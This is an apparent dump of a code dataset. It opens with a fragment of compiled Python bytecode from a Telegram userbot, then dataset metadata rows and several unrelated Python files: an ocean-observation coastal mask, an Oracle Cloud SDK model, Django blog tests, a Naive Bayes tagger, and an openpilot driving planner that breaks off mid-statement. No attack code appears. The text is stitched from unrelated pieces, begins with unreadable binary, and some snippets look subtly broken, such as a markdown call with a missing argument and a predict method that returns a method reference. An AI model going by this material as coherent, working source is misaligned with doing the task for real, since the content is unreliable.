\x00\x00\x00\x00\x03\x0e\x01\x06\x01\x02\x01\x0e\x01\x0e\x01\x04\x01\x06\x01\x02\x00\x02\xff\x0e\x02\x10\x01\x04\x01\x06\x01\x02\x00\x02\xffr%\x00\x00\x00z\x06^.editc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\xa6\x00\x00\x00|\x00j\x00}\x01|\x00\xa0\x01\xa1\x00I\x00d\x01H\x00}\x02|\x00j\x02\xa0\x03d\x02\xa1\x01I\x00d\x01H\x00}\x03t\x04|\x01d\x03d\x01\x85\x02\x19\x00\x83\x01}\x04d\x04}\x05|\x00j\x02\xa0\x05|\x02|\x03\xa1\x022\x00z>3\x00d\x01H\x00W\x00}\x01|\x05d\x05k\x02r~|\x01\xa0\x06|\x04\xa1\x01I\x00d\x01H\x00\x01\x00|\x00\xa0\x07\xa1\x00I\x00d\x01H\x00\x01\x00\x01\x00q\x8a|\x05d\x04\x17\x00}\x05qH6\x00t\x08r\xa2|\x00j\x02\xa0\tt\nd\x06\xa1\x02I\x00d\x01H\x00\x01\x00d\x01S\x00)\x07z. For .editme command, edit your last message. 
Nr\x1d\x00\x00\x00\xe9\x06\x00\x00\x00r\x08\x00\x00\x00r\n\x00\x00\x00z$Edit query was executed successfully)\x0br\x1e\x00\x00\x00r\x0b\x00\x00\x00r\x0c\x00\x00\x00Z\x0bget_peer_idr\x14\x00\x00\x00r\r\x00\x00\x00r\x11\x00\x00\x00r\x15\x00\x00\x00r\x04\x00\x00\x00r\x12\x00\x00\x00r\x05\x00\x00\x00)\x06r\x11\x00\x00\x00r!\x00\x00\x00r\x16\x00\x00\x00Z\x07self_idZ\x06stringr"\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\x06editer^\x00\x00\x00s\x1e\x00\x00\x00\x00\x03\x06\x01\x0e\x01\x12\x01\x10\x01\x04\x01\x1a\x01\x08\x01\x10\x01\x0e\x01\x04\x01\x0c\x01\x04\x01\x08\x01\x02\xffr\'\x00\x00\x00z\x04^.sdc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00s\x84\x00\x00\x00|\x00j\x00}\x01t\x01|\x01d\x01d\x02\x85\x02\x19\x00\x83\x01}\x02t\x02|\x00j\x00d\x02d\x03\x85\x02\x19\x00\x83\x01}\x03|\x00\xa0\x03\xa1\x00I\x00d\x03H\x00\x01\x00|\x00j\x04\xa0\x05|\x00j\x06|\x03\xa1\x02I\x00d\x03H\x00}\x04t\x07|\x02\x83\x01I\x00d\x03H\x00\x01\x00|\x04\xa0\x03\xa1\x00I\x00d\x03H\x00\x01\x00t\x08r\x80|\x00j\x04\xa0\x05t\td\x04\xa1\x02I\x00d\x03H\x00\x01\x00d\x03S\x00)\x05z4 For .sd command, make seflf-destructable messages. 
\xe9\x04\x00\x00\x00r&\x00\x00\x00Nz\x1asd query done successfully)\nr\x1e\x00\x00\x00r\x1f\x00\x00\x00r\x14\x00\x00\x00r\x15\x00\x00\x00r\x0c\x00\x00\x00r\x12\x00\x00\x00r\x13\x00\x00\x00r\x02\x00\x00\x00r\x04\x00\x00\x00r\x05\x00\x00\x00)\x05Z\x07destroyr!\x00\x00\x00Z\x07counterr\x1e\x00\x00\x00r#\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\x0cselfdestructq\x00\x00\x00s\x16\x00\x00\x00\x00\x03\x06\x01\x10\x01\x12\x01\x0e\x01\x16\x01\x0e\x01\x0e\x01\x04\x01\x08\x01\x02\xffr)\x00\x00\x00Z\x08messagesax\x01\x00\x00`.purge`\nUsage: Purges all messages starting from the reply.\n\n`.purgeme` <x>\nusage: Deletes x amount of your latest messages..\n\n`.del`\nUsage: Deletes the message you replied to.\n\n`.edit`\nUsage: Replace your last message with <newmessage>.\n\n`.sd `<x> <message>\nUsage: Creates a message that selfdestructs in x seconds.\nKeep the seconds under 100 since it puts your bot to sleepN)\x11\xda\x07__doc__Z\x07asyncior\x02\x00\x00\x00Z\x0ftelethon.errorsr\x03\x00\x00\x00Z\x07userbotr\x04\x00\x00\x00r\x05\x00\x00\x00r\x06\x00\x00\x00Z\x0euserbot.eventsr\x07\x00\x00\x00r\x1b\x00\x00\x00r$\x00\x00\x00r%\x00\x00\x00r\'\x00\x00\x00r)\x00\x00\x00\xda\x06updater\x19\x00\x00\x00r\x19\x00\x00\x00r\x19\x00\x00\x00r\x1a\x00\x00\x00\xda\x08<module>\x06\x00\x00\x00s$\x00\x00\x00\x04\x02\x0c\x02\x0c\x02\x14\x01\x0c\x03\n\x01\n!\n\x01\n\x1a\n\x01\n\x10\n\x01\n\x12\n\x01\n\x0e\x04\x01\x02\x01\x02\xfe')) | 2,149.25 | 8,526 | 0.762824 |
62be4516ddb55b3d98c8d6d7661a9c0dd9b1352f | 1,560 | py | Python | pyromsobs/extraCoastMask.py | metno/pyromsobs | 8479a13908797a5e7370f272a3462b7c6d59e45e | [
"MIT"
] | null | null | null | pyromsobs/extraCoastMask.py | metno/pyromsobs | 8479a13908797a5e7370f272a3462b7c6d59e45e | [
"MIT"
] | null | null | null | pyromsobs/extraCoastMask.py | metno/pyromsobs | 8479a13908797a5e7370f272a3462b7c6d59e45e | [
"MIT"
] | 1 | 2019-05-24T08:53:28.000Z | 2019-05-24T08:53:28.000Z | from .OBSstruct import OBSstruct
from .utils import setDimensions
from netCDF4 import Dataset
import numpy as np
def inds(ps):
if (np.floor(ps) == np.ceil(ps)):
ind = [ps.astype(int)]
else:
ind = [np.floor(ps).astype(int), np.ceil(ps).astype(int)]
return ind
def masked(var):
if np.ma.is_masked(var):
nans = var.mask
else:
nans = np.isnan(var)
notnans = np.logical_not(nans)
return nans, notnans
def extraCoastMask(S, hisfile, ngrdpts=0):
'''
This function apply an extra check to filter out observations close to the coast.
ngrdpts sets the number of grid points away from the observations where we
can tolerate land
'''
if not isinstance(S,OBSstruct):
fid = Dataset(S)
OBS = OBSstruct(fid)
else:
OBS=OBSstruct(S)
fid = Dataset(hisfile)
mask = fid.variables['mask_rho'][:]
J, I = mask.shape
fid.close()
for n in range(OBS.Ndatum):
i = inds(OBS.Xgrid[n])
j = inds(OBS.Ygrid[n])
i.extend([min(i) - ngrdpts, max(i) + ngrdpts])
j.extend([min(j) - ngrdpts, max(j) + ngrdpts])
varval = mask[max(0,min(j)): min(J, max(j)+1),max(0,min(i)): min(I, max(i)+1) ]
varval = np.ma.array(varval, mask = varval-1) # This will mask values of 0
nans, notnans = masked(varval)
if any(nans.ravel()):
# if any masked grid in search area, set value to nan
OBS.value[n] = np.nan
# Return only finite OBS.values
return OBS[np.isfinite(OBS.value)]
| 28.363636 | 87 | 0.601923 |
41debf2826f4ad6a904e296c7ae6e4238e050c08 | 8,045 | py | Python | src/oci/core/models/create_cluster_network_instance_pool_details.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | 3 | 2020-09-10T22:09:45.000Z | 2021-12-24T17:00:07.000Z | src/oci/core/models/create_cluster_network_instance_pool_details.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/core/models/create_cluster_network_instance_pool_details.py | ezequielramos/oci-python-sdk | cc4235cf217beaf9feed75760e9ce82610222762 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateClusterNetworkInstancePoolDetails(object):
    """
    The data to create an instance pool in a cluster network.

    Instances are populated from keyword arguments by the
    ``init_model_state_from_kwargs`` class decorator; the supported kwargs
    match the property names defined below.
    """

    def __init__(self, **kwargs):
        """
        Initializes a new CreateClusterNetworkInstancePoolDetails object.

        Keyword arguments (each corresponding to a property of this class):
          defined_tags (dict(str, dict(str, object)))
          display_name (str)
          freeform_tags (dict(str, str))
          instance_configuration_id (str)
          size (int)
        """
        # Swagger type of every attribute, used by the SDK's (de)serializer.
        self.swagger_types = {
            'defined_tags': 'dict(str, dict(str, object))',
            'display_name': 'str',
            'freeform_tags': 'dict(str, str)',
            'instance_configuration_id': 'str',
            'size': 'int'
        }
        # JSON field name of every attribute.
        self.attribute_map = {
            'defined_tags': 'definedTags',
            'display_name': 'displayName',
            'freeform_tags': 'freeformTags',
            'instance_configuration_id': 'instanceConfigurationId',
            'size': 'size'
        }
        # Backing fields start as None; the class decorator fills them in
        # from the keyword arguments.
        for attr in self.swagger_types:
            setattr(self, '_' + attr, None)

    @property
    def defined_tags(self):
        """
        Gets the defined_tags of this CreateClusterNetworkInstancePoolDetails.

        Defined tags for this resource. Each key is predefined and scoped to a
        namespace; see `Resource Tags`__.
        Example: `{"Operations": {"CostCenter": "42"}}`

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm

        :rtype: dict(str, dict(str, object))
        """
        return self._defined_tags

    @defined_tags.setter
    def defined_tags(self, defined_tags):
        """
        Sets the defined_tags of this CreateClusterNetworkInstancePoolDetails.

        :type: dict(str, dict(str, object))
        """
        self._defined_tags = defined_tags

    @property
    def display_name(self):
        """
        Gets the display_name of this CreateClusterNetworkInstancePoolDetails.

        A user-friendly name. Does not have to be unique, and it's changeable.
        Avoid entering confidential information.

        :rtype: str
        """
        return self._display_name

    @display_name.setter
    def display_name(self, display_name):
        """
        Sets the display_name of this CreateClusterNetworkInstancePoolDetails.

        :type: str
        """
        self._display_name = display_name

    @property
    def freeform_tags(self):
        """
        Gets the freeform_tags of this CreateClusterNetworkInstancePoolDetails.

        Free-form tags for this resource: simple key-value pairs with no
        predefined name, type, or namespace; see `Resource Tags`__.
        Example: `{"Department": "Finance"}`

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm

        :rtype: dict(str, str)
        """
        return self._freeform_tags

    @freeform_tags.setter
    def freeform_tags(self, freeform_tags):
        """
        Sets the freeform_tags of this CreateClusterNetworkInstancePoolDetails.

        :type: dict(str, str)
        """
        self._freeform_tags = freeform_tags

    @property
    def instance_configuration_id(self):
        """
        **[Required]** Gets the instance_configuration_id of this
        CreateClusterNetworkInstancePoolDetails.

        The `OCID`__ of the instance configuration associated with the
        instance pool.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm

        :rtype: str
        """
        return self._instance_configuration_id

    @instance_configuration_id.setter
    def instance_configuration_id(self, instance_configuration_id):
        """
        Sets the instance_configuration_id of this
        CreateClusterNetworkInstancePoolDetails.

        :type: str
        """
        self._instance_configuration_id = instance_configuration_id

    @property
    def size(self):
        """
        **[Required]** Gets the size of this CreateClusterNetworkInstancePoolDetails.

        The number of instances that should be in the instance pool.

        :rtype: int
        """
        return self._size

    @size.setter
    def size(self, size):
        """
        Sets the size of this CreateClusterNetworkInstancePoolDetails.

        :type: int
        """
        self._size = size

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        return other is not None and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other
2ffa019eae1bcff0b84cfb07b851396a82e83b8b | 959 | py | Python | DjangoBlog/tests.py | rokuuu1999/NewBrainss | 1b0da2fbd1a59db960f05f04f022b033caa4b3bc | [
"MIT"
] | null | null | null | DjangoBlog/tests.py | rokuuu1999/NewBrainss | 1b0da2fbd1a59db960f05f04f022b033caa4b3bc | [
"MIT"
] | null | null | null | DjangoBlog/tests.py | rokuuu1999/NewBrainss | 1b0da2fbd1a59db960f05f04f022b033caa4b3bc | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
from django.test import Client, RequestFactory, TestCase
from blog.models import Article, Category, Tag
from django.contrib.auth import get_user_model
from DjangoBlog.utils import get_current_site
from django.urls import reverse
import datetime
from DjangoBlog.utils import *
class DjangoBlogTest(TestCase):
def setUp(self):
pass
def test_utils(self):
md5 = get_md5('test')
self.assertIsNotNone(md5)
c = CommonMarkdown.get_markdown(
)
self.assertIsNotNone(c)
d = {
'd': 'key1',
'd2': 'key2'
}
data = parse_dict_to_url(d)
self.assertIsNotNone(data)
render = BlogMarkDownRenderer()
s = render.autolink('http://www.baidu.com')
self.assertTrue(s.find('nofollow') > 0)
s = render.link('http://www.baidu.com', 'test', 'test')
self.assertTrue(s.find('nofollow') > 0)
| 25.918919 | 63 | 0.632951 |
e9cb72d249affc5dc4dff5a4085b1a63524a35b3 | 6,820 | py | Python | Han-Ji/naive_bayes/Naive.py | jibanCat/DigitalHumanities | 256ad9fa8eba98565fbfb33e25ed045ad42767fc | [
"MIT"
] | 1 | 2021-06-03T20:53:18.000Z | 2021-06-03T20:53:18.000Z | Han-Ji/naive_bayes/Naive.py | jibanCat/DigitalHumanities | 256ad9fa8eba98565fbfb33e25ed045ad42767fc | [
"MIT"
] | null | null | null | Han-Ji/naive_bayes/Naive.py | jibanCat/DigitalHumanities | 256ad9fa8eba98565fbfb33e25ed045ad42767fc | [
"MIT"
] | 1 | 2018-05-22T09:18:21.000Z | 2018-05-22T09:18:21.000Z | import sys
import os
import re
import numpy as np
import pandas as pd
from collections import defaultdict
class NaiveBayes:
"""
A NaiveBayes class designed for calculate the probability of a
specific type of tags (time, place, person names, etc).
It is currently only able to calculate the probability for one sentence a
a time.
Also noted that I use hard-coded definition of likelihood tables to
calculate the posterior. Users are expected to use their domain knowledge
to decide the likelihoods based on whatever methods.
I followed a similar way for using Bayes rule as in
<How to Write a Spelling Corrector: https://norvig.com/spell-correct.html>
Args:
names (list) : a list of feature names.
iterables (list) : a list of iterables corresponding to feature names.
likelihoods (list) : a list of probabilities corresponding to feature names.
prior (float) : a prior probability associated with the type of tag you want to calssify.
"""
def __init__(self, names=[], iterables=[], likelihoods=[], prior=0.5, filename=None):
self.prior = prior
self.feature_vector = defaultdict(int)
self.definition_dict = self._convert2def(names, iterables, likelihoods)
if filename != None and os.path.exists(filename):
self.load_json(filename)
self.feature_vector_init()
self.likelihood_init()
self.iterable_init()
def feature_vector_init(self):
try:
for feature_dict in self.definition_dict['data']:
self.feature_vector[feature_dict['name']] = 0
except KeyError as e:
print('[Warning] No avaliable features currently.', e)
def likelihood_init(self):
self.likelihoods = { x['name']: x['likelihood'] for x in self.definition_dict['data'] }
def iterable_init(self):
self.iterables = { x['name']: x['iterable'] for x in self.definition_dict['data'] }
def prior_init(self):
# pior is freq of features
self.prior_list = defaultdict(float)
def _convert2def(self, names, iterables, likelihoods):
'''
convert 3 lists, names, iterables, and likelihoods into definition dictionary.
Definition dict policy:
definition_dict = {
"data" : [
{'name' : "數字",
'iterables': "是元正𨳝一二三四五六七八九十廿卅",
'likelihood': 0.6},
],
"columns" : [
{"name" : '(str) use few chars to represent the feature name',
"iterables": '(str, or any iterable) any iterable can be iterated',
"likelihood": '(float) the independent prob of the feature'}
]
}
'''
definition_dict = {
"data" : [],
"columns" : {
"name" : '(str) use few chars to represent the feature name',
"iterable": '(str, or any iterable) any iterable can be iterated',
"likelihood": '(float) the independent prob of the feature'}
}
for name,iterable,likelihood in zip(names,iterables,likelihoods):
definition_dict['data'].append(
{"name" : name,
"iterable" : iterable,
"likelihood" : likelihood}
)
return definition_dict
def load_json(self, filename):
import json
with open(filename, "r", encoding="utf-8") as file:
self.definition_dict = json.load(file)
def to_json(self, filename):
import json
with open(filename, "w", encoding="utf-8") as file:
json.dump(self.definition_dict, file)
def load(self, definition):
'''
Loading definition from a json file,
a definition is a table to define feature vectors and priors.
'''
self.definition_dict = definition
self.prior_init()
self.prior_list
def fit(self, Xtrain, Ytrain):
'''
Auto-extract a feature vector from a given document (str),
Note: I have no idea currently ...
'''
self.feature_vector
def predict(self, X):
return np.array([
self.predict
])
def predict_phrase(self, phrase):
'''
Predict a single phrase
'''
return np.round( self.calc_posterior(phrase) )
def calc_posterior(self, phrase, regularize=None):
'''
Clac the posterior based on Bayes rule.
Args:
phrase (str) : the phrase you want to calc the naive bayes probability.
regularize (float, default None) : if float, using this number as
punishment for irrelevant words
Returns:
prob (float) : the posterior probability of phrase being classified
'''
self.feature_vector_init()
self.update_feature_vector(phrase, regularize=regularize)
return self._calc_bayes_rule_iid(self.feature_vector, self.likelihoods, self.prior)
def _calc_bayes_rule_iid(self, feature_vector, likelihood, prior):
"""Calc the posterior using bayes theorem.
The assumption here is the naive bayes, so the prob of features
are independent. The joint prob of likelihood is a prod of individual
feature prob."""
positive_likelihood = prior * np.prod([
likelihood[key]**hits for key, hits in feature_vector.items()
])
negative_likelihood = (1 - prior) * np.prod([
(1 - likelihood[key])**hits for key, hits in feature_vector.items()
])
# Bayes theorem
posterior = positive_likelihood / (positive_likelihood + negative_likelihood)
return posterior
def update_feature_vector(self, phrase, regularize=None):
"""
update the feature vector based on the list of features and a given phrase and
a given feature name.
Args:
phrase (str) : the phrase you want to calc the naive bayes probability.
regularize (float, default None) : if float, using this number as
punishment for irrelevant words
"""
matched_words = set([])
for name in self.iterables.keys():
for x in self.iterables[name]:
if x in phrase:
self.feature_vector[name] += 1
matched_words.add(x)
if type(regularize) == float:
self.likelihoods['irrelevant'] = regularize
self.feature_vector['irrelevant'] = len(re.sub(
r"[{}]".format(''.join(matched_words)), r"", phrase
)) if len(matched_words) > 0 else len(phrase)
| 36.470588 | 97 | 0.595015 |
14fd3f7251f2a9bd5b958b7cbbd76bd2c8b715f1 | 15,566 | py | Python | selfdrive/controls/lib/longitudinal_planner.py | DS1SQM/OPKR085test_210525 | 787fd16a20782e31d3430a71a50207dc844c3152 | [
"MIT"
] | null | null | null | selfdrive/controls/lib/longitudinal_planner.py | DS1SQM/OPKR085test_210525 | 787fd16a20782e31d3430a71a50207dc844c3152 | [
"MIT"
] | null | null | null | selfdrive/controls/lib/longitudinal_planner.py | DS1SQM/OPKR085test_210525 | 787fd16a20782e31d3430a71a50207dc844c3152 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import os
import math
from datetime import datetime
import time
import numpy as np
from common.params import Params
from common.numpy_fast import interp
import cereal.messaging as messaging
from cereal import car
from common.realtime import sec_since_boot
from selfdrive.swaglog import cloudlog
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.speed_smoother import speed_smoother
from selfdrive.controls.lib.longcontrol import LongCtrlState
from selfdrive.controls.lib.fcw import FCWChecker
from selfdrive.controls.lib.long_mpc import LongitudinalMpc
from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX
from selfdrive.controls.lib.long_mpc_model import LongitudinalMpcModel
LON_MPC_STEP = 0.2 # first step is 0.2s
AWARENESS_DECEL = -0.2 # car smoothly decel at .2m/s^2 when user is distracted
# lookup tables VS speed to determine min and max accels in cruise
# make sure these accelerations are smaller than mpc limits
#_A_CRUISE_MIN_V_FOLLOWING = [-3.5, -3.5, -3.5, -2.5, -1.5]
_A_CRUISE_MIN_V_FOLLOWING = [-2.7, -2.4, -2.1, -1.5, -0.5]
_A_CRUISE_MIN_V = [-1.0, -.8, -.67, -.5, -.30]
_A_CRUISE_MIN_BP = [ 0., 5., 10., 20., 40.]
# need fast accel at very low speed for stop and go
# make sure these accelerations are smaller than mpc limits
_A_CRUISE_MAX_V = [1.2, 1.2, 0.65, .4]
_A_CRUISE_MAX_V_FOLLOWING = [1.65, 1.65, 0.65, .4]
_A_CRUISE_MAX_BP = [0., 6.4, 22.5, 40.]
# Lookup table for turns
_A_TOTAL_MAX_V = [1.7, 3.2]
_A_TOTAL_MAX_BP = [20., 40.]
def calc_cruise_accel_limits(v_ego, following):
    """Return np.vstack([a_min, a_max]) cruise accel limits interpolated at v_ego.

    The *following* tables apply when closely tracking an accelerating lead.
    """
    if following:
        min_table, max_table = _A_CRUISE_MIN_V_FOLLOWING, _A_CRUISE_MAX_V_FOLLOWING
    else:
        min_table, max_table = _A_CRUISE_MIN_V, _A_CRUISE_MAX_V
    a_min = interp(v_ego, _A_CRUISE_MIN_BP, min_table)
    a_max = interp(v_ego, _A_CRUISE_MAX_BP, max_table)
    return np.vstack([a_min, a_max])
def limit_accel_in_turns(v_ego, angle_steers, a_target, CP):
    """Cap the max longitudinal accel so total (lateral + longitudinal) accel
    stays within budget, avoiding hard acceleration while cornering (which can
    lose the path target in turns)."""
    total_budget = interp(v_ego, _A_TOTAL_MAX_BP, _A_TOTAL_MAX_V)
    # Lateral acceleration from the bicycle model: v^2 * curvature.
    a_lat = v_ego**2 * angle_steers * CV.DEG_TO_RAD / (CP.steerRatio * CP.wheelbase)
    a_long_allowed = math.sqrt(max(total_budget**2 - a_lat**2, 0.))
    return [a_target[0], min(a_target[1], a_long_allowed)]
class ModelMpcHelper:
    """Resamples modelV2 path predictions onto the 10 one-second-spaced
    samples that the LongMpcModel class expects."""

    def __init__(self):
        # Timesteps (s) of the 33 model predictions: t_i = i^2 / 102.4.
        self.model_t = [i ** 2 / 102.4 for i in range(33)]
        # Target timesteps: whole seconds 0..9.
        self.mpc_t = list(range(10))
        # For each whole second, the index of the closest model timestep.
        self.model_t_idx = [
            min(range(len(self.model_t)), key=lambda i: abs(self.model_t[i] - sec))
            for sec in self.mpc_t
        ]
        assert len(self.model_t_idx) == 10, 'Needs to be length 10 for mpc'

    def convert_data(self, sm):
        """Return (distances, speeds, accelerations) sampled at whole seconds,
        or three empty lists when no model data is available."""
        modelV2 = sm['modelV2']
        if not sm.alive['modelV2'] or len(modelV2.position.x) == 0:
            return [], [], []
        speeds = [modelV2.velocity.x[t] for t in self.model_t_idx]
        distances = [modelV2.position.x[t] for t in self.model_t_idx]
        # Central differences over the 1s-spaced speeds for the interior points...
        accelerations = [(speeds[t + 1] - speeds[t - 1]) / 2 for t in range(1, 9)]
        # ...then linearly extrapolate at both edges.
        accelerations.append(accelerations[-1] - (accelerations[-2] - accelerations[-1]))
        accelerations.insert(0, accelerations[0] - (accelerations[1] - accelerations[0]))
        return distances, speeds, accelerations
class Planner():
  def __init__(self, CP):
    """Build the longitudinal planner: MPC solvers, FCW checker and state."""
    self.CP = CP  # car parameters (interface/tuning)

    # Lead-following MPCs for the two tracked leads, plus a model-path MPC.
    self.mpc1 = LongitudinalMpc(1)
    self.mpc2 = LongitudinalMpc(2)
    self.mpc_model = LongitudinalMpcModel()
    self.model_mpc_helper = ModelMpcHelper()

    # Velocity/acceleration solution state, carried between iterations.
    self.v_acc_start = 0.0
    self.a_acc_start = 0.0
    self.v_acc_next = 0.0
    self.a_acc_next = 0.0
    self.v_acc = 0.0         # chosen target speed (m/s)
    self.v_acc_future = 0.0  # predicted future speed of the chosen source
    self.a_acc = 0.0         # chosen target acceleration (m/s^2)
    self.v_cruise = 0.0
    self.a_cruise = 0.0

    self.longitudinalPlanSource = 'cruise'  # which solution was picked last
    self.fcw_checker = FCWChecker()  # forward collision warning logic
    self.path_x = np.arange(192)
    self.fcw = False

    self.params = Params()
    self.first_loop = True

    # State for the map-based speed-limit ("SpeedCamera") feature, which the
    # update() method drives via logcat polling.
    self.target_speed_map = 0.0
    self.target_speed_map_counter = 0
    self.target_speed_map_counter_check = False
    self.target_speed_map_counter1 = 0
    self.target_speed_map_counter2 = 0
    self.target_speed_map_counter3 = 0
    self.target_speed_map_dist = 0
    self.target_speed_map_block = False
    self.target_speed_map_sign = False
    # NOTE(review): 'tartget' is a typo, but other modules may reference this
    # attribute name -- keep as-is.
    self.tartget_speed_offset = int(self.params.get("OpkrSpeedLimitOffset", encoding="utf8"))
    self.vego = 0
def choose_solution(self, v_cruise_setpoint, enabled, model_enabled):
possible_futures = [self.mpc1.v_mpc_future, self.mpc2.v_mpc_future, v_cruise_setpoint]
if enabled:
solutions = {'cruise': self.v_cruise}
if self.mpc1.prev_lead_status:
solutions['mpc1'] = self.mpc1.v_mpc
if self.mpc2.prev_lead_status:
solutions['mpc2'] = self.mpc2.v_mpc
if self.mpc_model.valid and model_enabled:
solutions['model'] = self.mpc_model.v_mpc
possible_futures.append(self.mpc_model.v_mpc_future) # only used when using model
slowest = min(solutions, key=solutions.get)
self.longitudinalPlanSource = slowest
# Choose lowest of MPC and cruise
if slowest == 'mpc1':
self.v_acc = self.mpc1.v_mpc
self.a_acc = self.mpc1.a_mpc
elif slowest == 'mpc2':
self.v_acc = self.mpc2.v_mpc
self.a_acc = self.mpc2.a_mpc
elif slowest == 'cruise':
self.v_acc = self.v_cruise
self.a_acc = self.a_cruise
elif slowest == 'model':
self.v_acc = self.mpc_model.v_mpc
self.a_acc = self.mpc_model.a_mpc
self.v_acc_future = min(possible_futures)
def update(self, sm, CP):
"""Gets called when new radarState is available"""
cur_time = sec_since_boot()
v_ego = sm['carState'].vEgo
self.vego = v_ego
long_control_state = sm['controlsState'].longControlState
if CP.sccBus == 2:
v_cruise_kph = sm['carState'].vSetDis
else:
v_cruise_kph = sm['controlsState'].vCruise
force_slow_decel = sm['controlsState'].forceDecel
v_cruise_kph = min(v_cruise_kph, V_CRUISE_MAX)
v_cruise_setpoint = v_cruise_kph * CV.KPH_TO_MS
lead_1 = sm['radarState'].leadOne
lead_2 = sm['radarState'].leadTwo
enabled = (long_control_state == LongCtrlState.pid) or (long_control_state == LongCtrlState.stopping)
following = lead_1.status and lead_1.dRel < 45.0 and lead_1.vLeadK > v_ego and lead_1.aLeadK > 0.0
self.v_acc_start = self.v_acc_next
self.a_acc_start = self.a_acc_next
if self.params.get_bool("OpkrMapEnable"):
self.target_speed_map_counter += 1
if self.target_speed_map_counter >= (50+self.target_speed_map_counter1) and self.target_speed_map_counter_check == False:
self.target_speed_map_counter_check = True
os.system("logcat -d -s opkrspdlimit,opkrspd2limit | grep opkrspd | tail -n 1 | awk \'{print $7}\' > /data/params/d/LimitSetSpeedCamera &")
os.system("logcat -d -s opkrspddist | grep opkrspd | tail -n 1 | awk \'{print $7}\' > /data/params/d/LimitSetSpeedCameraDist &")
self.target_speed_map_counter3 += 1
if self.target_speed_map_counter3 > 2:
self.target_speed_map_counter3 = 0
os.system("logcat -c &")
elif self.target_speed_map_counter >= (75+self.target_speed_map_counter1):
self.target_speed_map_counter1 = 0
self.target_speed_map_counter = 0
self.target_speed_map_counter_check = False
mapspeed = self.params.get("LimitSetSpeedCamera", encoding="utf8")
mapspeeddist = self.params.get("LimitSetSpeedCameraDist", encoding="utf8")
if mapspeed is not None and mapspeeddist is not None:
mapspeed = int(float(mapspeed.rstrip('\n')))
mapspeeddist = int(float(mapspeeddist.rstrip('\n')))
if mapspeed > 29:
self.target_speed_map = mapspeed
self.target_speed_map_dist = mapspeeddist
if self.target_speed_map_dist > 1001:
self.target_speed_map_block = True
self.target_speed_map_counter1 = 80
os.system("logcat -c &")
else:
self.target_speed_map = 0
self.target_speed_map_dist = 0
self.target_speed_map_block = False
elif mapspeed is None and mapspeeddist is None and self.target_speed_map_counter2 < 2:
self.target_speed_map_counter2 += 1
self.target_speed_map_counter = 51
self.target_speed_map = 0
self.target_speed_map_dist = 0
self.target_speed_map_counter_check = True
self.target_speed_map_block = False
self.target_speed_map_sign = False
else:
self.target_speed_map_counter = 49
self.target_speed_map_counter2 = 0
self.target_speed_map = 0
self.target_speed_map_dist = 0
self.target_speed_map_counter_check = False
self.target_speed_map_block = False
self.target_speed_map_sign = False
# Calculate speed for normal cruise control
if enabled and not self.first_loop and not sm['carState'].brakePressed and not sm['carState'].gasPressed:
accel_limits = [float(x) for x in calc_cruise_accel_limits(v_ego, following)]
jerk_limits = [min(-0.1, accel_limits[0]), max(0.1, accel_limits[1])] # TODO: make a separate lookup for jerk tuning
accel_limits_turns = limit_accel_in_turns(v_ego, sm['carState'].steeringAngleDeg, accel_limits, self.CP)
if force_slow_decel and False: # awareness decel is disabled for now
# if required so, force a smooth deceleration
accel_limits_turns[1] = min(accel_limits_turns[1], AWARENESS_DECEL)
accel_limits_turns[0] = min(accel_limits_turns[0], accel_limits_turns[1])
self.v_cruise, self.a_cruise = speed_smoother(self.v_acc_start, self.a_acc_start,
v_cruise_setpoint,
accel_limits_turns[1], accel_limits_turns[0],
jerk_limits[1], jerk_limits[0],
LON_MPC_STEP)
# cruise speed can't be negative even is user is distracted
self.v_cruise = max(self.v_cruise, 0.)
else:
starting = long_control_state == LongCtrlState.starting
a_ego = min(sm['carState'].aEgo, 0.0)
reset_speed = self.CP.minSpeedCan if starting else v_ego
reset_accel = self.CP.startAccel if starting else a_ego
self.v_acc = reset_speed
self.a_acc = reset_accel
self.v_acc_start = reset_speed
self.a_acc_start = reset_accel
self.v_cruise = reset_speed
self.a_cruise = reset_accel
self.mpc1.set_cur_state(self.v_acc_start, self.a_acc_start)
self.mpc2.set_cur_state(self.v_acc_start, self.a_acc_start)
self.mpc_model.set_cur_state(self.v_acc_start, self.a_acc_start)
self.mpc1.update(sm['carState'], lead_1)
self.mpc2.update(sm['carState'], lead_2)
distances, speeds, accelerations = self.model_mpc_helper.convert_data(sm)
self.mpc_model.update(sm['carState'].vEgo, sm['carState'].aEgo,
distances,
speeds,
accelerations)
self.choose_solution(v_cruise_setpoint, enabled, self.params.get_bool("ModelLongEnabled"))
# determine fcw
if self.mpc1.new_lead:
self.fcw_checker.reset_lead(cur_time)
blinkers = sm['carState'].leftBlinker or sm['carState'].rightBlinker
self.fcw = self.fcw_checker.update(self.mpc1.mpc_solution, cur_time,
sm['controlsState'].active,
